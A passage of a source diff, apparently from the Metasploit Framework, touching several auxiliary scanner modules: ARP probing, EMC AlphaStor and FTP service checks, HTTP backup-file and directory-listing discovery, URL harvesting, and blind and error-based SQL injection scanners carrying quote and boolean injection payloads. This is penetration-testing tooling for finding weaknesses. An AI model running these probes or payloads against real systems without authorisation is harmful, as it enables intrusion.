n = Racket::Racket.new
n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14))
n.l2.src_mac = smac
n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff'
n.l2.ethertype = 0x0806
n.l3 = Racket::L3::ARP.new
n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST
n.l3.sha = n.l2.src_mac
@ -83,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
n.l3.tpa = dhost
n.pack
end
def getreply
pkt = capture.next
return if not pkt
eth = Racket::L2::Ethernet.new(pkt)
return if not eth.ethertype == 0x0806

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -10,10 +14,10 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'EMC AlphaStor Device Manager Service.',
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'MC',
'License' => MSF_LICENSE
)
register_options([Opt::RPORT(3000),], self.class)
end
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
connect
pkt = "\x68" + Rex::Text.rand_text_alphanumeric(5) + "\x00" * 512
sock.put(pkt)
sleep(0.25)
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Host #{ip} is running the EMC AlphaStor Device Manager.")
else
print_error("Host #{ip} is not running the service...")
end
end
disconnect

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -10,10 +14,10 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'EMC AlphaStor Library Manager Service.',
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'MC',
'License' => MSF_LICENSE
)
register_options([Opt::RPORT(3500),], self.class)
end
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
connect
pkt = "\x51" + "\x00" * 529
sock.put(pkt)
sleep(1)
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Host #{ip} is running the EMC AlphaStor Library Manager.")
else
print_error("Host #{ip} is not running the service...")
end
end
disconnect

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(21),
@ -37,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
def run_host(target_host)
begin
res = connect_login(true, false)
banner.strip! if banner
dir = Rex::Text.rand_text_alpha(8)
if res
if res
write_check = send_cmd( ['MKD', dir] , true)
if (write_check and write_check =~ /^2/)
@ -64,11 +68,11 @@ class Metasploit3 < Msf::Auxiliary
end
disconnect
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionError, ::IOError
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,21 +22,21 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Backup File Scanner',
'Description' => %q{
This module identifies the existence of possible copies
This module identifies the existence of possible copies
of a specific file in a given path.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp'])
], self.class)
], self.class)
end
def run_host(ip)
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
'.backup',
'.bak',
'.copy',
'.old',
'.old',
'.orig',
'.temp',
'.txt',
@ -68,9 +68,9 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain'
}, 20)
if (res and res.code >= 200 and res.code < 300)
if (res and res.code >= 200 and res.code < 300)
print_status("Found #{wmap_base_url}#{file}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
:type => 'BACKUP_FILE',
:data => "#{file}"
)
else
print_status("NOT Found #{wmap_base_url}#{file}")
print_status("NOT Found #{wmap_base_url}#{file}")
#To be removed or just displayed with verbose debugging.
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -24,17 +24,17 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Blind SQL Injection GET QUERY Scanner',
'Description' => %q{
This module identifies the existence of Blind SQL injection issues
This module identifies the existence of Blind SQL injection issues
in GET Query parameters values.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('METHOD', [true, "HTTP Method","GET"]),
@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('QUERY', [ false, "HTTP URI Query", '']),
OptString.new('DATA', [ false, "HTTP Body Data", '']),
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
], self.class)
], self.class)
end
def run_host(ip)
gvars = nil
pvars = nil
cvars = nil
rnum=rand(10000)
rnum=rand(10000)
valstr = [
[ 'numeric',
[ 'numeric',
" AND #{rnum}=#{rnum} ",
" AND #{rnum}=#{rnum+1} "
],
[ 'single quotes',
],
[ 'single quotes',
"' AND '#{rnum}'='#{rnum}",
"' AND '#{rnum}'='#{rnum+1}"
],
[ 'double quotes',
[ 'double quotes',
"\" AND \"#{rnum}\"=\"#{rnum}",
"\" AND \"#{rnum}\"=\"#{rnum+1}"
]
@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary
#
# Dealing with empty query/data and making them hashes.
#
if !datastore['QUERY'] or datastore['QUERY'].empty?
datastore['QUERY'] = nil
gvars = nil
else
gvars = queryparse(datastore['QUERY']) #Now its a Hash
end
if !datastore['DATA'] or datastore['DATA'].empty?
datastore['DATA'] = nil
pvars = nil
else
pvars = queryparse(datastore['DATA'])
end
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
datastore['COOKIE'] = nil
cvars = nil
@ -95,56 +95,56 @@ class Metasploit3 < Msf::Auxiliary
end
#SEND NORMAL REQUEST
#SEND NORMAL REQUEST
begin
normalres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
sigtxt = ""
if normalres
if normalres.body.empty?
print_error("No body to obtain signature")
return
else
sigtxt = normalres.body
#print_status("#{sigtxt}")
#print_status("#{sigtxt}")
end
else
print_error("No response")
return
end
#print_status("Normal request sent.")
#print_status("Normal request sent.")
valstr.each do |tarr|
#QUERY
if gvars
gvars.each do |key,value|
gvars.each do |key,value|
gvars = queryparse(datastore['QUERY']) #Now its a Hash
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
#SEND TRUE REQUEST
gvars[key] = gvars[key]+tarr[1]
begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
@ -152,47 +152,47 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if normalres and trueres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
normalsize = normalres.body.length
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
if reltruesize == normalsize
if reltruesize == normalsize
#If true it means that we have a small better chance of this being a blind sql injection.
#SEND FALSE REQUEST
gvars[key] = gvars[key]+tarr[2]
gvars[key] = gvars[key]+tarr[2]
begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
#true_false_dist = edit_distance(falseres.body,trueres.body)
#print_status("rellenf #{relfalsesize}")
if reltruesize > relfalsesize
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -201,15 +201,15 @@ class Metasploit3 < Msf::Auxiliary
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
)
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
end
else
print_status("NO False Response.")
print_status("NO False Response.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
else
print_status("Normal and True requests are different.")
@ -220,16 +220,16 @@ class Metasploit3 < Msf::Auxiliary
end
end
#DATA
if pvars
pvars.each do |key,value|
pvars.each do |key,value|
pvars = queryparse(datastore['DATA']) #Now its a Hash
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
#SEND TRUE REQUEST
pvars[key] = pvars[key]+tarr[1]
pvarstr = ""
pvars.each do |tkey,tvalue|
if pvarstr
@ -237,12 +237,12 @@ class Metasploit3 < Msf::Auxiliary
end
pvarstr << tkey+'='+tvalue
end
begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
@ -250,55 +250,55 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if normalres and trueres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
normalsize = normalres.body.length
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
if reltruesize == normalsize
if reltruesize == normalsize
#If true it means that we have a small better chance of this being a blind sql injection.
#SEND FALSE REQUEST
pvars[key] = pvars[key]+tarr[2]
pvarstr = ""
pvars.each do |tkey,tvalue|
if pvarstr
pvarstr << '&'
end
pvarstr << tkey+'='+tvalue
end
end
begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => pvarstr
}, 20)
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
#true_false_dist = edit_distance(falseres.body,trueres.body)
#print_status("rellenf #{relfalsesize}")
if reltruesize > relfalsesize
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -307,15 +307,15 @@ class Metasploit3 < Msf::Auxiliary
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
)
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
end
else
print_status("NO False Response.")
print_status("NO False Response.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
else
print_status("Normal and True requests are different.")
@ -324,8 +324,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("No response.")
end
end
end
end
end
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,41 +22,41 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Copy File Scanner',
'Description' => %q{
This module identifies the existence of possible copies
This module identifies the existence of possible copies
of a specific file in a given path.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path/file to identify copies", '/index.asp'])
], self.class)
], self.class)
register_advanced_options(
[
OptInt.new('ErrorCode', [ true, "Error code for non existent directory", 404]),
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
]
),
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
end
def run_host(ip)
conn = true
ecode = nil
emesg = nil
ecode = datastore['ErrorCode'].to_i
dm = datastore['NoDetailMessages']
prestr = [
'Copy_(1)_of_',
'Copy_(2)_of_',
@ -66,18 +66,18 @@ class Metasploit3 < Msf::Auxiliary
'Copy',
'_'
]
tpathf = datastore['PATH']
testf = tpathf.split('/').last
#
# Detect error code
#
#
begin
randfile = Rex::Text.rand_text_alpha(5).chomp
filec = tpathf.sub(testf,randfile + testf)
res = send_request_cgi({
'uri' => filec,
'method' => 'GET',
@ -85,13 +85,13 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
return if not res
tcode = res.code.to_i
tcode = res.code.to_i
# Look for a string we can signature on as well
if(tcode >= 200 and tcode <= 299)
File.open(datastore['HTTP404Sigs']).each do |str|
if(res.body.index(str))
emesg = str
@ -109,10 +109,10 @@ class Metasploit3 < Msf::Auxiliary
ecode = tcode
print_status("Using code '#{ecode}' as not found.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
return if not conn
@ -120,24 +120,24 @@ class Metasploit3 < Msf::Auxiliary
if testf
prestr.each do |pre|
filec = tpathf.sub(testf,pre + testf)
begin
res = send_request_cgi({
'uri' => filec,
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
end
else
if ecode != 400 and res.code.to_i == 400
print_error("[#{wmap_target_host}] Server returned a 400 error on #{wmap_base_url}#{filec} [#{res.code.to_i}]")
else
else
print_status("[#{wmap_target_host}] Found #{wmap_base_url}#{filec} [#{res.code.to_i}]")
report_note(
:host => ip,
:proto => 'HTTP',
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end
end
end

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,29 +21,29 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Directory Listing Scanner',
'Description' => %q{
This module identifies directory listing vulnerabilities
in a given directory path.
This module identifies directory listing vulnerabilities
in a given directory path.
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path to identify directoy listing", '/'])
], self.class)
], self.class)
end
def run_host(ip)
tpath = datastore['PATH']
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
end
begin
res = send_request_cgi({
@ -51,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.code >= 200 and res.code < 300)
if res.to_s.include? "<title>Index of /" and res.to_s.include? "<h1>Index of /"
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -59,12 +63,12 @@ class Metasploit3 < Msf::Auxiliary
:type => 'DIR_LISTING',
:data => "#{tpath}"
)
end
if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>"
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -72,15 +76,15 @@ class Metasploit3 < Msf::Auxiliary
:type => 'DIR_LISTING',
:data => "#{tpath}"
)
end
else
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

View File

@ -1,4 +1,7 @@
#!/usr/bin/env ruby
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Pull Del.icio.us Links (URLs) for a domain',
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages. },
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
], self.class)
register_advanced_options(
@ -55,30 +58,30 @@ class Metasploit3 < Msf::Auxiliary
lastpage = 1
end
end
list.delete_if{|x| x==nil}
list.uniq!
list.sort!
return list
end
def write_output(data)
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
file_name = datastore['OUTFILE']
file_name = datastore['OUTFILE']
if FileTest::exist?(file_name)
print_status("OUTFILE already existed, appending..")
else
print_status("OUTFILE did not exist, creating..")
end
File.open(file_name, 'a') do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@ -87,21 +90,21 @@ class Metasploit3 < Msf::Auxiliary
else
@proxysrv,@proxyport = nil, nil
end
target = datastore['DOMAIN']
urls = []
print_status("Pulling urls from Delicious.com")
urls = pull_urls(target)
print_status("Located #{urls.count} addresses for #{target}")
if datastore['OUTFILE']
if datastore['OUTFILE']
write_output(urls.join("\n") + "\n")
else
urls.each do |i|
puts(i)
end
end
end
end
end

View File

@ -1,4 +1,7 @@
#!/usr/bin/env ruby
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Pull Archive.org stored URLs for a domain',
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
replaying during a web assessment. Finding unlinked and old pages. },
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
], self.class)
register_advanced_options(
@ -45,34 +48,34 @@ class Metasploit3 < Msf::Auxiliary
response.each do |line|
pages << line.gsub!(/(.+>)(.+)(<\/a><br>)\n/, '\2')
end
pages.delete_if{|x| x==nil}
pages.uniq!
pages.sort!
for i in (0..(pages.count-1))
fix = "http://" + pages[i].to_s
pages[i] = fix
end
return pages
end
def write_output(data)
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
file_name = datastore['OUTFILE']
file_name = datastore['OUTFILE']
if FileTest::exist?(file_name)
print_status("OUTFILE already existed, appending..")
else
print_status("OUTFILE did not exist, creating..")
end
File.open(file_name, 'a') do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@ -81,21 +84,21 @@ class Metasploit3 < Msf::Auxiliary
else
@proxysrv,@proxyport = nil, nil
end
target = datastore['DOMAIN']
urls = []
print_status("Pulling urls from Archive.org")
urls = pull_urls(target)
print_status("Located #{urls.count} addresses for #{target}")
if datastore['OUTFILE']
if datastore['OUTFILE']
write_output(urls.join("\n") + "\n")
else
urls.each do |i|
puts(i)
end
end
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -24,16 +24,16 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Error Based SQL Injection Scanner',
'Description' => %q{
This module identifies the existence of Error Based SQL injection issues. Still requires alot of work
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('METHOD', [ true, "HTTP Method",'GET']),
@ -42,55 +42,55 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('DATA', [ false, "HTTP Body Data", '']),
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
], self.class)
register_advanced_options(
[
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
end
def run_host(ip)
gvars = nil
pvars = nil
cvars = nil
sqlinj = [
[ "'" ,'Single quote'],
[ "')",'Single quote and parenthesis'],
[ "\"",'Double quote'],
[ "#{rand(10)}'", 'Random value with single quote']
[ "#{rand(10)}'", 'Random value with single quote']
]
errorstr = [
["Unclosed quotation mark after the character string",'MSSQL','string'],
["Syntax error in string in query expression",'MSSQL','string'],
["Microsoft OLE DB Provider",'MSSQL','unknown'],
["You have an error in your SQL syntax",'MySQL','unknown'],
["java.sql.SQLException",'unknown','unknown']
["java.sql.SQLException",'unknown','unknown']
]
#
# Dealing with empty query/data and making them hashes.
#
if !datastore['QUERY'] or datastore['QUERY'].empty?
datastore['QUERY'] = nil
gvars = nil
else
gvars = queryparse(datastore['QUERY']) #Now its a Hash
end
if !datastore['DATA'] or datastore['DATA'].empty?
datastore['DATA'] = nil
pvars = nil
else
pvars = queryparse(datastore['DATA'])
end
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
datastore['COOKIE'] = nil
cvars = nil
@ -100,50 +100,50 @@ class Metasploit3 < Msf::Auxiliary
#
# Send normal request to check if error is generated
# Send normal request to check if error is generated
# (means the error is caused by other means)
#
#
begin
normalres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if !datastore['NoDetailMessages']
print_status("Normal request sent.")
print_status("Normal request sent.")
end
found = false
inje = nil
dbt = nil
injt = nil
if normalres
errorstr.each do |estr,dbtype,injtype|
if normalres.body.include? estr
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_error("[#{wmap_target_host}] Error string appears in the normal response, unable to test")
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
print_error("[#{wmap_target_host}] DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -151,64 +151,64 @@ class Metasploit3 < Msf::Auxiliary
:type => 'DATABASE_ERROR',
:data => "#{datastore['PATH']} Error: #{inje} DB: #{dbt}"
)
return
end
else
print_error("[#{wmap_target_host}] No response")
return
return
end
#
# Test URI Query parameters
#
found = false
if gvars
sqlinj.each do |istr,idesc|
if found
break
if found
break
end
gvars.each do |key,value|
gvars.each do |key,value|
gvars = queryparse(datastore['QUERY']) #Now its a Hash
gvars[key] = gvars[key]+istr
if !datastore['NoDetailMessages']
print_status("- Testing query with #{idesc}. Parameter #{key}:")
print_status("- Testing query with #{idesc}. Parameter #{key}:")
end
begin
testres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if testres
if testres
errorstr.each do |estr,dbtype,injtype|
if testres.body.include? estr
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
print_status("[#{wmap_target_host}] Vuln query parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -216,40 +216,40 @@ class Metasploit3 < Msf::Auxiliary
:type => 'SQL_INJECTION',
:data => "#{datastore['PATH']} Location: QUERY Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
)
break
end
else
print_error("[#{wmap_target_host}] No response")
print_error("[#{wmap_target_host}] No response")
return
end
end
end
end
end
end
gvars = queryparse(datastore['QUERY'])
end
#
# Test DATA parameters
#
found = false
if pvars
sqlinj.each do |istr,idesc|
if found
break
if found
break
end
pvars.each do |key,value|
pvars.each do |key,value|
pvars = queryparse(datastore['DATA']) #Now its a Hash
if !datastore['NoDetailMessages']
print_status("- Testing data with #{idesc}. Parameter #{key}:")
print_status("- Testing data with #{idesc}. Parameter #{key}:")
end
pvars[key] = pvars[key]+istr
pvarstr = ""
pvars.each do |tkey,tvalue|
if pvarstr
@ -257,19 +257,19 @@ class Metasploit3 < Msf::Auxiliary
end
pvarstr << tkey+'='+tvalue
end
begin
testres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => pvarstr
